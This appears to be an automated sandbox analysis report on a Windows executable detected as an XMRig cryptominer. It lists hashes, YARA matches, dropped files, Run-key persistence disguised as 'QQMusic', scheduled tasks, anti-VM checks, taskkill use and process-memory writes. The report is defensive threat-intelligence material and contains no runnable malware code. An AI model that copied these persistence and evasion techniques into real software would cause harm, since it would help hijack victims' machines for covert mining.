xmrig | d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239

General

Target

d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
Size

9.0MB
MD5

2d927fdb462570728a981443bf36d19f
SHA1

eb4f351d937729b14a196bf228ba12a2ff07e73e
SHA256

d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239
SHA512

efdf3b568fa07d67bb89eb8880c5140653321f9267c771045d1c7be6a6e88fd680059b779d2e4da497e0a88ff1e9adac6e293bb254e5c4dda776aafd518097c9
SSDEEP

196608:rhHMBGC3PtXtT+Was8/wq1wo9JoYx5JAMdJOnZTG1IvQSaKe6NZOn:r2G02wuwasMdJOnZKVSaaNZOn

Score

10^/10

xmrig miner persistence upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Detects Windows executables referencing non-Windows User-Agents 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe	INDICATOR_SUSPICIOUS_EXE_NoneWindowsUA

UPX dump on OEP (original entry point) 28 IoCs

Processes:

resource	yara_rule
\ProgramData\spreadTpqrst.exe	UPX
behavioral1/memory/2176-10-0x000000013FEE0000-0x0000000140524000-memory.dmp	UPX
behavioral1/memory/2176-136-0x000000013FEE0000-0x0000000140524000-memory.dmp	UPX
behavioral1/memory/2176-142-0x000000013FEE0000-0x0000000140524000-memory.dmp	UPX
behavioral1/memory/2976-145-0x000000013F8D0000-0x000000013FF14000-memory.dmp	UPX
behavioral1/memory/2976-147-0x000000013F8D0000-0x000000013FF14000-memory.dmp	UPX
behavioral1/memory/624-151-0x000000013F1E0000-0x000000013F824000-memory.dmp	UPX
behavioral1/memory/624-152-0x000000013F1E0000-0x000000013F824000-memory.dmp	UPX
behavioral1/memory/624-154-0x000000013F1E0000-0x000000013F824000-memory.dmp	UPX
behavioral1/memory/1472-158-0x000000013F170000-0x000000013F7B4000-memory.dmp	UPX
behavioral1/memory/1472-160-0x000000013F170000-0x000000013F7B4000-memory.dmp	UPX
behavioral1/memory/1676-163-0x000000013FDE0000-0x0000000140424000-memory.dmp	UPX
behavioral1/memory/1676-165-0x000000013FDE0000-0x0000000140424000-memory.dmp	UPX
behavioral1/memory/1676-167-0x000000013FDE0000-0x0000000140424000-memory.dmp	UPX
behavioral1/memory/1840-170-0x000000013F540000-0x000000013FB84000-memory.dmp	UPX
behavioral1/memory/1840-172-0x000000013F540000-0x000000013FB84000-memory.dmp	UPX
behavioral1/memory/2112-175-0x000000013FE40000-0x0000000140484000-memory.dmp	UPX
behavioral1/memory/2112-177-0x000000013FE40000-0x0000000140484000-memory.dmp	UPX
behavioral1/memory/2112-179-0x000000013FE40000-0x0000000140484000-memory.dmp	UPX
behavioral1/memory/2980-182-0x000000013FF00000-0x0000000140544000-memory.dmp	UPX
behavioral1/memory/2980-185-0x000000013FF00000-0x0000000140544000-memory.dmp	UPX
behavioral1/memory/2760-188-0x000000013F7F0000-0x000000013FE34000-memory.dmp	UPX
behavioral1/memory/2760-190-0x000000013F7F0000-0x000000013FE34000-memory.dmp	UPX
behavioral1/memory/2760-192-0x000000013F7F0000-0x000000013FE34000-memory.dmp	UPX
behavioral1/memory/2548-195-0x000000013F920000-0x000000013FF64000-memory.dmp	UPX
behavioral1/memory/2548-198-0x000000013F920000-0x000000013FF64000-memory.dmp	UPX
behavioral1/memory/2368-202-0x000000013F650000-0x000000013FC94000-memory.dmp	UPX
behavioral1/memory/2368-203-0x000000013F650000-0x000000013FC94000-memory.dmp	UPX

XMRig Miner payload 17 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/2176-136-0x000000013FEE0000-0x0000000140524000-memory.dmp	xmrig
behavioral1/memory/2176-142-0x000000013FEE0000-0x0000000140524000-memory.dmp	xmrig
behavioral1/memory/624-151-0x000000013F1E0000-0x000000013F824000-memory.dmp	xmrig
behavioral1/memory/624-152-0x000000013F1E0000-0x000000013F824000-memory.dmp	xmrig
behavioral1/memory/624-154-0x000000013F1E0000-0x000000013F824000-memory.dmp	xmrig
behavioral1/memory/1472-160-0x000000013F170000-0x000000013F7B4000-memory.dmp	xmrig
behavioral1/memory/1676-165-0x000000013FDE0000-0x0000000140424000-memory.dmp	xmrig
behavioral1/memory/1676-167-0x000000013FDE0000-0x0000000140424000-memory.dmp	xmrig
behavioral1/memory/1840-172-0x000000013F540000-0x000000013FB84000-memory.dmp	xmrig
behavioral1/memory/2112-177-0x000000013FE40000-0x0000000140484000-memory.dmp	xmrig
behavioral1/memory/2112-179-0x000000013FE40000-0x0000000140484000-memory.dmp	xmrig
behavioral1/memory/2980-185-0x000000013FF00000-0x0000000140544000-memory.dmp	xmrig
behavioral1/memory/2760-190-0x000000013F7F0000-0x000000013FE34000-memory.dmp	xmrig
behavioral1/memory/2760-192-0x000000013F7F0000-0x000000013FE34000-memory.dmp	xmrig
behavioral1/memory/2548-198-0x000000013F920000-0x000000013FF64000-memory.dmp	xmrig
behavioral1/memory/2368-202-0x000000013F650000-0x000000013FC94000-memory.dmp	xmrig
behavioral1/memory/2368-203-0x000000013F650000-0x000000013FC94000-memory.dmp	xmrig

Executes dropped EXE 13 IoCs

Processes:

spreadTpqrst.exed4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exeSMB.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exespreadTpqrst.exe

pid	process
2176	spreadTpqrst.exe
2984	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1480	SMB.exe
2976	spreadTpqrst.exe
624	spreadTpqrst.exe
1472	spreadTpqrst.exe
1676	spreadTpqrst.exe
1840	spreadTpqrst.exe
2112	spreadTpqrst.exe
2980	spreadTpqrst.exe
2760	spreadTpqrst.exe
2548	spreadTpqrst.exe
2368	spreadTpqrst.exe

Loads dropped DLL 2 IoCs

Processes:

d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe

pid	process
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe

UPX packed file 28 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\ProgramData\spreadTpqrst.exe	upx
behavioral1/memory/2176-10-0x000000013FEE0000-0x0000000140524000-memory.dmp	upx
behavioral1/memory/2176-136-0x000000013FEE0000-0x0000000140524000-memory.dmp	upx
behavioral1/memory/2176-142-0x000000013FEE0000-0x0000000140524000-memory.dmp	upx
behavioral1/memory/2976-145-0x000000013F8D0000-0x000000013FF14000-memory.dmp	upx
behavioral1/memory/2976-147-0x000000013F8D0000-0x000000013FF14000-memory.dmp	upx
behavioral1/memory/624-151-0x000000013F1E0000-0x000000013F824000-memory.dmp	upx
behavioral1/memory/624-152-0x000000013F1E0000-0x000000013F824000-memory.dmp	upx
behavioral1/memory/624-154-0x000000013F1E0000-0x000000013F824000-memory.dmp	upx
behavioral1/memory/1472-158-0x000000013F170000-0x000000013F7B4000-memory.dmp	upx
behavioral1/memory/1472-160-0x000000013F170000-0x000000013F7B4000-memory.dmp	upx
behavioral1/memory/1676-163-0x000000013FDE0000-0x0000000140424000-memory.dmp	upx
behavioral1/memory/1676-165-0x000000013FDE0000-0x0000000140424000-memory.dmp	upx
behavioral1/memory/1676-167-0x000000013FDE0000-0x0000000140424000-memory.dmp	upx
behavioral1/memory/1840-170-0x000000013F540000-0x000000013FB84000-memory.dmp	upx
behavioral1/memory/1840-172-0x000000013F540000-0x000000013FB84000-memory.dmp	upx
behavioral1/memory/2112-175-0x000000013FE40000-0x0000000140484000-memory.dmp	upx
behavioral1/memory/2112-177-0x000000013FE40000-0x0000000140484000-memory.dmp	upx
behavioral1/memory/2112-179-0x000000013FE40000-0x0000000140484000-memory.dmp	upx
behavioral1/memory/2980-182-0x000000013FF00000-0x0000000140544000-memory.dmp	upx
behavioral1/memory/2980-185-0x000000013FF00000-0x0000000140544000-memory.dmp	upx
behavioral1/memory/2760-188-0x000000013F7F0000-0x000000013FE34000-memory.dmp	upx
behavioral1/memory/2760-190-0x000000013F7F0000-0x000000013FE34000-memory.dmp	upx
behavioral1/memory/2760-192-0x000000013F7F0000-0x000000013FE34000-memory.dmp	upx
behavioral1/memory/2548-195-0x000000013F920000-0x000000013FF64000-memory.dmp	upx
behavioral1/memory/2548-198-0x000000013F920000-0x000000013FF64000-memory.dmp	upx
behavioral1/memory/2368-202-0x000000013F650000-0x000000013FC94000-memory.dmp	upx
behavioral1/memory/2368-203-0x000000013F650000-0x000000013FC94000-memory.dmp	upx

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3691908287-3775019229-3534252667-1000\Software\Microsoft\Windows\CurrentVersion\Run\QQMusic = "C:\\Users\\Admin\\AppData\\Local\\Temp\\d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe"	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\QQMusic = "C:\\Users\\Admin\\AppData\\Local\\Temp\\d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe"	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 2 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

Processes:

d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exed4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe

description	ioc	process
File opened (read-only)	\??\VBoxMiniRdrDN	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
File opened (read-only)	\??\VBoxMiniRdrDN	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe

Drops file in Program Files directory 1 IoCs

Processes:

d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe

description	ioc	process
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\web\webbase.xml	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

2952 schtasks.exe
Gathers network information 2 TTPs 5 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command and Scripting Interpreter
T1059

Processes:

ipconfig.exeipconfig.exeipconfig.exeipconfig.exeipconfig.exe

pid process

1460 ipconfig.exe
1516 ipconfig.exe
756 ipconfig.exe
1552 ipconfig.exe
2260 ipconfig.exe
Kills process with taskkill 6 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid process

1648 taskkill.exe
3020 taskkill.exe
1592 taskkill.exe
264 taskkill.exe
1664 taskkill.exe
1216 taskkill.exe

pid	process
2952	schtasks.exe

pid	process
1460	ipconfig.exe
1516	ipconfig.exe
756	ipconfig.exe
1552	ipconfig.exe
2260	ipconfig.exe

pid	process
1648	taskkill.exe
3020	taskkill.exe
1592	taskkill.exe
264	taskkill.exe
1664	taskkill.exe
1216	taskkill.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe

pid	process
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe

pid process

1936 d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe

Suspicious use of AdjustPrivilegeToken 32 IoCs

Processes:

d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exetaskkill.exespreadTpqrst.exetaskkill.exespreadTpqrst.exetaskkill.exespreadTpqrst.exetaskkill.exespreadTpqrst.exespreadTpqrst.exetaskkill.exespreadTpqrst.exetaskkill.exespreadTpqrst.exespreadTpqrst.exe

description	pid	process
Token: SeDebugPrivilege	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
Token: SeBackupPrivilege	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
Token: SeSecurityPrivilege	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
Token: SeSecurityPrivilege	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
Token: SeBackupPrivilege	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
Token: SeSecurityPrivilege	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
Token: SeBackupPrivilege	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
Token: SeSecurityPrivilege	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
Token: SeBackupPrivilege	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
Token: SeSecurityPrivilege	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
Token: SeDebugPrivilege	1592	taskkill.exe
Token: SeLockMemoryPrivilege	2176	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	2176	spreadTpqrst.exe
Token: SeDebugPrivilege	264	taskkill.exe
Token: SeLockMemoryPrivilege	624	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	624	spreadTpqrst.exe
Token: SeDebugPrivilege	1664	taskkill.exe
Token: SeLockMemoryPrivilege	1676	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	1676	spreadTpqrst.exe
Token: SeDebugPrivilege	1216	taskkill.exe
Token: SeLockMemoryPrivilege	1840	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	1840	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	2112	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	2112	spreadTpqrst.exe
Token: SeDebugPrivilege	1648	taskkill.exe
Token: SeLockMemoryPrivilege	2760	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	2760	spreadTpqrst.exe
Token: SeDebugPrivilege	3020	taskkill.exe
Token: SeLockMemoryPrivilege	2548	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	2548	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	2368	spreadTpqrst.exe
Token: SeLockMemoryPrivilege	2368	spreadTpqrst.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.execmd.execmd.execmd.exetaskeng.execmd.execmd.exe

description	pid	process	target process
PID 1936 wrote to memory of 2208	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe	cmd.exe
PID 1936 wrote to memory of 2208	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe	cmd.exe
PID 1936 wrote to memory of 2208	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe	cmd.exe
PID 1936 wrote to memory of 2208	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe	cmd.exe
PID 1936 wrote to memory of 2948	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe	cmd.exe
PID 1936 wrote to memory of 2948	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe	cmd.exe
PID 1936 wrote to memory of 2948	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe	cmd.exe
PID 1936 wrote to memory of 2948	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe	cmd.exe
PID 2208 wrote to memory of 2952	2208	cmd.exe	schtasks.exe
PID 2208 wrote to memory of 2952	2208	cmd.exe	schtasks.exe
PID 2208 wrote to memory of 2952	2208	cmd.exe	schtasks.exe
PID 2208 wrote to memory of 2952	2208	cmd.exe	schtasks.exe
PID 2948 wrote to memory of 1592	2948	cmd.exe	taskkill.exe
PID 2948 wrote to memory of 1592	2948	cmd.exe	taskkill.exe
PID 2948 wrote to memory of 1592	2948	cmd.exe	taskkill.exe
PID 2948 wrote to memory of 1592	2948	cmd.exe	taskkill.exe
PID 1936 wrote to memory of 1536	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe	cmd.exe
PID 1936 wrote to memory of 1536	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe	cmd.exe
PID 1936 wrote to memory of 1536	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe	cmd.exe
PID 1936 wrote to memory of 1536	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe	cmd.exe
PID 1536 wrote to memory of 1552	1536	cmd.exe	ipconfig.exe
PID 1536 wrote to memory of 1552	1536	cmd.exe	ipconfig.exe
PID 1536 wrote to memory of 1552	1536	cmd.exe	ipconfig.exe
PID 1536 wrote to memory of 1552	1536	cmd.exe	ipconfig.exe
PID 1936 wrote to memory of 2176	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe	spreadTpqrst.exe
PID 1936 wrote to memory of 2176	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe	spreadTpqrst.exe
PID 1936 wrote to memory of 2176	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe	spreadTpqrst.exe
PID 1936 wrote to memory of 2176	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe	spreadTpqrst.exe
PID 1464 wrote to memory of 2984	1464	taskeng.exe	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
PID 1464 wrote to memory of 2984	1464	taskeng.exe	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
PID 1464 wrote to memory of 2984	1464	taskeng.exe	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
PID 1464 wrote to memory of 2984	1464	taskeng.exe	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe
PID 1936 wrote to memory of 1480	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe	SMB.exe
PID 1936 wrote to memory of 1480	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe	SMB.exe
PID 1936 wrote to memory of 1480	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe	SMB.exe
PID 1936 wrote to memory of 1480	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe	SMB.exe
PID 1936 wrote to memory of 2412	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe	cmd.exe
PID 1936 wrote to memory of 2412	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe	cmd.exe
PID 1936 wrote to memory of 2412	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe	cmd.exe
PID 1936 wrote to memory of 2412	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe	cmd.exe
PID 1936 wrote to memory of 2976	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe	spreadTpqrst.exe
PID 1936 wrote to memory of 2976	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe	spreadTpqrst.exe
PID 1936 wrote to memory of 2976	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe	spreadTpqrst.exe
PID 1936 wrote to memory of 2976	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe	spreadTpqrst.exe
PID 2412 wrote to memory of 264	2412	cmd.exe	taskkill.exe
PID 2412 wrote to memory of 264	2412	cmd.exe	taskkill.exe
PID 2412 wrote to memory of 264	2412	cmd.exe	taskkill.exe
PID 2412 wrote to memory of 264	2412	cmd.exe	taskkill.exe
PID 1936 wrote to memory of 624	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe	spreadTpqrst.exe
PID 1936 wrote to memory of 624	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe	spreadTpqrst.exe
PID 1936 wrote to memory of 624	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe	spreadTpqrst.exe
PID 1936 wrote to memory of 624	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe	spreadTpqrst.exe
PID 1936 wrote to memory of 2248	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe	cmd.exe
PID 1936 wrote to memory of 2248	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe	cmd.exe
PID 1936 wrote to memory of 2248	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe	cmd.exe
PID 1936 wrote to memory of 2248	1936	d4d451457c40bf4dacb36cbbedc89c6dede6dba47493b472aa1450d8c9f87239.exe	cmd.exe
PID 2248 wrote to memory of 2260	2248	cmd.exe	ipconfig.exe
PID 2248 wrote to memory of 2260	2248	cmd.exe	ipconfig.exe
